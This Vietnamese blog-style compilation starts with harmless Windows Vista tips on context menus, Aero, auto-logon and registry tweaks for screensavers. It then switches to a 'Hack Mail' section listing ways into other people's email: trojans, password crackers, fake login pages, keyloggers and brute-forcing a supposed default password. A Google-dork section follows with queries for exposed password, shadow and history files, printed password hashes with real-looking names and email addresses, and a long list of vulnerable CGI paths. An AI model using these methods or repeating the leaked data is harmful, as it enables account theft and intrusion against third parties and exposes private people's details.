Menu xuất hiện khi kích chuột phải (còn gọi là menu ngữ cảnh) trong Windows Explorer của Vista khá hữu ích. Kích chuột phải một file, menu ngữ cảnh sẽ xuất hiện, thông qua đó bạn có thể thực hiện một số hoạt động như mở, in, xóa, copy hay tạo shortcut của file đó. Các tùy chọn xuất hiện khác nhau tùy thuộc vào thiết lập hệ thống của bạn và các chương trình mà bạn đã cài đặt.
Nếu muốn bạn có thể thêm tùy chọn vào menu ngữ cảnh. Giữ phím Shift, đồng thời kích chuột phải vào file, bạn sẽ thấy một vài tùy chọn menu mới được đánh dấu bằng các mũi tên (như hình bên)
Tác dụng của từng tùy chọn mới như sau:
- Open as Read-Only: như là tên của nó, nó sẽ mở file như là một file chỉ đọc (không được phép ghi).
- Pin to Start Menu: Phần này sẽ tạo một shorcut cho file ở phần phía trên của menu Start. Để gỡ bỏ shortcut này từ menu Start, kích chuột phải vào shortcut và chọn Remove from this list.
- Add to Quick Launch: Tùy chọn này sẽ thêm một shortcut của file lên thanh công cụ Quick Launch (thanh công cụ ở bên trái của Taskbar). Để bỏ shortcut này, kích chuột phải vào nó và chọn Delete.
- Copy as Path: Tùy chọn này sẽ sao chép nên và đường dẫn file vào bộ đệm của Windows (Ví dụ: C:\Budget\2007 memo.xls). Bạn có thể dán nội dung này vào vị trí thích hợp ngay sau đó.
VI. Tăng tốc độ hoặc tắt Windows Aero
Windows Aero có thể là phần lôi cuốn của giao diện nhưng nó còn phụ thuộc vào phần cứng máy bạn. Nó có thể làm chậm dần hệ thống của bạn. Hãy làm tăng tốc độ của máy tính lên bằng cách tắt hoàn toàn nó hoặc tắt một vài tính năng Aero nhưng vẫn cho phép một số tính năng khác hoạt động.
Để tắt Aero:
1. Kích chuột phải vào nền desktop của Windows, chọn Personalize > Window Color and Appearance.
2. Kích chọn Open classic appearance properties for more color options.
3. Trong phần hộp thoại Color scheme sổ xuống, chọn Windows Vista Basic hoặc Windows Vista Standard. Kích OK và Aero sẽ được tắt.
Nhưng lại có một số thứ bạn rất thích ở Aero (như các hoạt ảnh cửa sổ) và có một số thứ lại không thích (như các cửa sổ trong suốt)? Bạn hoàn toàn có thể tắt đi một vài tính năng Aero để làm tăng tốc độ máy tính nhưng vẫn giữ lại được một số tính năng ưa thích.
Để làm điều này, chọn Start > Computer > System Properties. Kích vào Advanced system settings, sau đó, trong phần Performance bạn chọn nút Settings. Trong cửa sổ giao diện như hình dưới, chọn Custom, bỏ chọn những tính năng mà bạn muốn tắt, sau đó kích OK
VII. Bỏ qua giao diện log-on vào Windows Vista trên nhiều tài khoản
Khi bạn có hơn một tài khoản người dùng trên một máy tính Windows Vista, mỗi một lần khởi động lại máy bạn lại thấy danh sách màn hình Welcome của tất cả các tài khoản trên máy. Kích chọn một trong số đó và nhập vào thông tin truy cập để có thể vào sử dụng Windows Vista.
Vậy nếu bạn muốn vừa có thể sử dụng một tài khoản chính được sử dụng gần nhất và vẫn có thể chọn các tài khoản khác tùy từng thời điểm? Bạn nên tạo một “đường tắt” tới màn hình Welcome chứa danh sách tất cả các tài khoản người dùng, sau đó tự động truy cập vào khi bạn khởi động lại Windows Vista – trong khi Vista dường như không thể thực hiện được nhiệm vụ đơn giản này.
Trên thực tế, bạn hoàn toàn có thể làm được bằng cách xem các bước dưới đây. Thực hiện theo hướng dẫn, bạn sẽ tự động truy cập vào một tài khoản chính mà vẫn có thể lựa chọn tài khoản khác khi cần:
1. Tại phần Search hay cửa sổ lệnh, nhập vào control userpasswords2 và nhấn Enter. Màn hình User Accounts sẽ xuất hiện.
2. Chọn tài khoản mà bạn muốn tự động đăng nhập, sau đó bỏ chọn tại phần Users must enter a user name and password to use this computer. Kích OK.
3. Hộp thoại Automatically Log on xuất hiện. Nhập mật khẩu vào ô cho tài khoản mà bạn muốn tự động truy cập. (Nếu tài khoản hiển thị không có cái mà bạn muốn tự động truy cập, hãy nhập chính xác tên username và password cho tài khoản. Kích OK.
4. Vậy là từ bây giờ, bạn sẽ tự động truy cập sử dụng tài khoản đã chọn. Khi muốn truy cập vào mà muốn lựa chọn các tài khoản khác, sử dụng Fast User Switching: Kích vào nút Start, kích vào mũi tên ở góc dới phải của menu Start, chọn Switch User. Bạn sẽ thấy màn hình chứa danh sách của toàn bộ các tài khoản trên máy tính, khi đó hãy chọn tài khoản cần truy cập.
VIII. Thay đổi con trỏ nhấp nháy của Vista
Con trỏ nhấp nháy của Windows Vista là một hình xược dọc mỏng như dao cạo và thỉnh thoảng bạn có thể khó nhìn thấy nó nó, đặc biệt là khi sử dụng laptop. Nhưng nếu muốn thì rất dễ dàng để thấy nó, thậm chí tạo ra một con trỏ đậm hơn. Chọn Control Panel > Ease of Access > Optimize visual display. Kéo thanh trượt xuống dưới màn hình, cho đến khi thấy phần Make things on the screen easier to see.
Từ đây, bạn có thể cho đậm hơn con trỏ của Windows Vista. Trong hộp sổ xuống bên cạnh phần Set the thickness of the blinking cursor, hãy chọn số thích hợp. Số càng lớn thì con trỏ càng đậm. Bạn có thể xem trước độ dày của con trỏ tại phần Preview ở bên cạnh menu sổ xuống. Kích vào Save. Toàn bộ con trỏ Trong Windows Vista sẽ đậm hơn và dễ thấy hơn.
IX. “Hack” màn hình nghỉ của Vista
Có nhiều nguyên nhân không giải thích được khi Microsoft không cho phép bạn tùy chọn chê độ làm việc của màn hình nghỉ trong Windows Vista. Ví dụ, thay đổi cách sủi bọt trong màn hình nghỉ Bubbles, hay thay đổi số lượng và độ dày của các dải ruy băng trong màn hình nghỉ Ribbons.
Để tùy chỉnh màn hình nghỉ Bubbles, bạn hãy khởi động Registry Editor bằng cách nhập regedit vào ô Search trong Start hoặc nhập trong cửa sổ lệnh, sau đó nhấn Enter.
1. Vào phần:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\
Screensavers\Bubbles
Chọn Edit > New DWORD (32-bit) Value và tạo một DWORD mới với tên MaterialGlass. Nhập giá trị 1 trong phần Value data nếu bạn muốn bong bóng có màu thùy tinh trong suốt, còn nhập giá trị 0 cho bong bóng kim loại.
2. Tạo một DWORD có tên ShowShadows và đưa vào giá trị 1 để hiện thị bóng ở bên dưới bong bóng, và giá trị 0 nếu không muốn có bóng.
3. Tạo một DWORD có tên ShowBubbles và đưa vào giá trị 1 nếu muốn hiển thị bong bóng trên nền desktop, và giá trị 0 nếu muốn trả lại nền ban đầu.
Bạn có thể hack tương tự với màn hình nghỉ Ribbons. Để làm điều này, mở Registry Editor và:
1. Vào phần
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\
Screensavers\Ribbons
Chọn Edit > New DWORD (32-bit) Value, và tạo một DWORD mới với tên NumRibbons. Kích vào Decimal, và nhập giá trị số ruy băng mà bạn muốn hiện thị. Số lượng tối thiếu là 1 và tối đa là 256
2. Tạo một DWORD với tên RibbonWidth, chọn Decimal và nhập vào giá trị độ dày cho từng ruy băng. Số càng nhỏ ruy băng càng mảnh.
3. Khi kết thúc Registry Editor, các thiết lập mới của bạn sẽ bắt đầu có tác dụng
Nếu muốn thay đổi bất kỳ một thiết lập nào cho từng màn hình nghỉ, bạn phải vào Registry, tìm đến DWORD thích hợp và thay đổi giá trị. Để khôi phục lại các thiết lập gốc, bạn hãy xóa các Registry đã tạo.
X. Tạo hoạt ảnh chậm khi phóng to/thu nhỏ cửa sổ
Giờ là phần có thể làm tạp bẩn trong Registy và cũng là phần cuối cùng của bài hack thú vị này. Nó hoàn toàn phục vụ cho mục đích giải trí và vui mắt. Nó cho phép bạn làm chậm lại quá trình hoạt động hoạt ảnh khi đóng nhỏ và phóng to các cửa sổ trên thanh Taskbar.
Để làm điều này, trước hết bạn phải chỉnh sửa Registry, sau đó khi muốn làm chậm các hoạt ảnh, hãy giữ phím Shift. Nhả phím Shift ra thì các hoạt ảnh lại trở về tố độ thông thường.
Khở động Registry Editor và thực hiện các thao tác sau
1. Vào HKEY_CURRENT_USER\Software\Microsoft\Windows\DWM2.
2. Chọn Edit > New DWORD (32-bit) Value và tạo một DWORD mới với tên AnimationsShiftKey. Đặt cho nó giá trị là 1.
3. Đóng Registry Editor, log off ra khỏi Windows và sau đó log vào trở lại hoặc nếu không thì khởi động lại máy.
4. Giữ phím Shift và phóng to hay thu nhỏ một cửa sổ. Hoạt ảnh sẽ chậm lại đáng kể. Để hoạt ảnh trở về tốc độ bình thường thì bạn chỉ cần nhả phím Shift ra.
Hack Mail
Cach 1 :
Hỏi trực tiếp : thật điên rồ .
Cach 2 :
Bạn biết thông tin về người đó ,vậy hãy nhỡ yahoo giúp đỡ.Cách này trược kia có thể thực hiện được nhưng bây giờ yahoo không cho request.
Cach 3 :
Sử dụng virut-trojan. đây là cách hay sử dụng nhất của hacker.Có rất nhiều bài viết hướng dẫn các bạn hãy tự tham khảo.Có hàng trăm virut trojan cho bạn lựa chọn tùy bạn thui.
Cach 4 :
Sử dụng các chương trình crack(bẻ )
ví dụ yahoomail thì có:crackpassyahoo
hotmail thì có :crack passhotmail.
Cach 5 :
Sử dụng các chương trình fake( bẫy lỗi) như fake login, giả giao diện mail…….
Cach 6 :Bạn có một website tại sao không sử dụng Godwill gắn chúng vô web .
Cach 7 : Nếu ở dịch vụ bạn đang ngồi có thể sử dụng keylogger 5.04,perfecf keyloggerv1.47, starrcmd……..rất nhiều.
Cach 8 : Tấn công phê chuẩn đầu vào .
với cách này bạn có thể vào mail mà không cần đăng nhập .Thật bất ngờ khi vào mà không cần biết pass hì.
Cach 9 :
Lỗi đơn giản lắm password yahoo bị mắc lỗi default password
” yahoo***”
vậy *** ở đây là gì đơn giản là 3 con số những số này nằm trong khoảng từ 0–>999 việc brute chở nên dễ dàng rồi………….
Tuy nhiên big problem nằm ở chỗ nếu hì hục nghiên cứu làm sao modify info ngay tại yahoo thì có vẻ như không được ổn . Nhớ rằng yahoo là reseller của INWW việc chúng ta cần làm là nhào vô cái Registry key để lấy info sau đó quay ra inww.com để change infor
Chúc các bạn thành công. (Nhưng trong 9 cách này, bi giờ chắc chỉ còn áp dụng được một vài cách thoai! “Gà” bây giờ hiếm lắm nên cũng hok “Múa rìu qua mắt …pro” được!
*Hack bằng Google:
Cách đây vài ngày tôi có đọc trên một forum nói về cách có thể dùng Goggle.com để tìm các thông tin quan trọng mà không cần bẻ khóa một website nào hết.
Bạn biết đối Google.com khi “search” bạn có thể dùng một số từ khóa để tìm một số cụm từ của các website thường không muốn người khác vào.Google là một công cụ tuyệt vời nếu các bạn dùng sẽ cảm thấy nó hay thế nào
Vậy chúng ta hảy bắt đầu nha.
Bạn vào website google.com và bắt đầu đánh dòng lệnh sau trên ô Search:
allintitle: “index of/root”
Sau đó bạn sẻ thấy khoảng 3120 sites có cụm từ này, bây giờ bạn có thể từng cái một kiểm tra xem có thông tin nào bạn cần không,
Thế nhưng có bạn không thích các thông tin này, nhưng lại thích tìm hiểu về password của admin các site, các bạn có thể đánh dòng lệnh sau:
inurl:”auth_user_file.txt”
Wow, bây giờ các bạn tha hồ mà nghiên cứu password & username, khi tôi đánh dòng lệnh này, website đầu tiên mà tôi bấm vào là Here và nó cho tôi data như sau:
$1$nr$90wmeMQIDw0HforiU2vUG1|admin|admin|Martin|Kl ässner|martin-klaessner@online.de|on
$1$nr$90wmeMQIDw0HforiU2vUG1|Klaessner_Martin|norm al|Martin|Klässner|martin-klaessner@online.de|on
$1$nr$90wmeMQIDw0HforiU2vUG1|Klaessner_Juergen|nor mal|Jürgen|Klässner|juergen-klaessner@online.de|on
$1$as$reDTTzzp8RaJUXVjXNksi0|Mauer_Harald|normal|H arald|Mauer|hmauer@germering.baynet.de|on
Cái này là cái gì vậy nè, phần này dành cho các cao thủ diển dịch nhen hihihi.
Nói chung với Google.com các bạn có thể dùng các chuổi sau đây, và chắc chắn các bạn sẻ không bao giờ chán khi lên net nửa đâu.
“Index of /admin”
“Index of /password”
“Index of /mail”
“Index of /” +passwd
“Index of /” +password.txt
“Index of /” +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
allintitle: “index of/admin”
allintitle: “index of/root”
allintitle: sensitive filetypeoc
allintitle: restricted filetype :mail
allintitle: restricted filetypeoc site:gov
inurlasswd filetype:txt
inurl:admin filetypeb
inurl:iisadmin
inurl:”auth_user_file.txt”
inurl:”wwwroot/*.”
top secret site:mil
confidential site:mil
allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history
intitle:”Index of” .sh_history
intitle:”Index of” .bash_history
intitle:”index of” passwd
intitle:”index of” people.lst
intitle:”index of” pwd.db
intitle:”index of” etc/shadow
intitle:”index of” spwd
intitle:”index of” master.passwd
intitle:”index of” htpasswd
intitle:”index of” members OR accounts
intitle:”index of” user_carts OR user_cart
ALTERNATIVE INPUTS
_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.asp\
dvwssr.dll
cart32.exe
add.exe
index.jsp
SessionServlet
shtml.dll
index.cfm
page.cfm
shtml.exe
web_store.cgi
shop.cgi
upload.asp
default.asp
pbserver.dll
phf
test-cgi
finger
Count.cgi
jj
php.cgi
php
nph-test-cgi
handler
webdist.cgi
webgais
websendmail
faxsurvey
htmlscript
perl.exe
wwwboard.pl
www-sql
view-source
campas
aglimpse
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
filemail.pl
maillist.pl
info2www
files.pl
bnbform.cgi
survey.cgi
classifieds.cgi
wrap
cgiwrap
edit.pl
perl
names.nsf
webgais
dumpenv.pl
test.cgi
submit.cgi
guestbook.cgi
guestbook.pl
cachemgr.cgi
responder.cgi
perlshop.cgi
query
w3-msql
plusmail
htsearch
infosrch.cgi
publisher
ultraboard.cgi
db.cgi
formmail.cgi
allmanage.pl
ssi
adpassword.txt
redirect.cgi
cvsweb.cgi
login.jsp
dbconnect.inc
admin
htgrep
wais.pl
amadmin.pl
subscribe.pl
news.cgi
auctionweaver.pl
.htpasswd
acid_main.php
access.log
log.htm
log.html
log.txt
logfile
logfile.htm
logfile.html
logfile.txt
logger.html
stat.htm
stats.htm
stats.html
stats.txt
webaccess.htm
wwwstats.html
source.asp
perl
mailto.cgi
YaBB.pl
mailform.pl
cached_feed.cgi
global.cgi
Search.pl
build.cgi
common.php
show
global.inc
ad.cgi
WSFTP.LOG
index.html~
~
index.html.bak
.bak
print.cgi
register.cgi
webdriver
bbs_forum.cgi
mysql.class
sendmail.inc
CrazyWWWBoard.cgi
search.pl
way-board.cgi
webpage.cgi
pwd.dat
adcycle
post-query
help.cgi
Chúc các bạn may mắn và tìm thấy nhửng gì muốn tìm hihiih
